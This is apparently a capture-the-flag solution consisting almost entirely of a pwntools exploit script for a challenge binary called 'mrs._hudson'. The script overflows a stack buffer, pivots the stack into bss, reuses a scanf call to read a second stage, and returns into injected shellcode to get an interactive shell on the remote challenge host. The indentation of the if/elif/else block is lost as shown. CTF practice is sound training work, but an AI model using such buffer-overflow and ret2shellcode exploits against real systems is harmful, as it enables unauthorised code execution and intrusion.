Rating:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from sys import argv

if argv[1] == 'r':
r = remote('178.62.249.106', '8642')
elif argv[1] == 'l':
r = remote('localhost', 6000)
else:
r = process('./mrs._hudson')

context(os='linux', arch='amd64', log_level='info')

scanf = 0x40066f # scanf("%s", $rbp-0x70)
fake_stack = 0x601040 + 0x70 # bss + 0x70

payload = b"A" * 112
payload += p64(fake_stack) # rbp
payload += p64(scanf) # ret addr


r.sendlineafter("2000.\n", payload)
payload = asm(shellcraft.sh()).ljust(0x70 + 8, b'A')
payload += p64(fake_stack - 0x70) # ret2shellcode
r.sendline(payload)
r.interactive()
```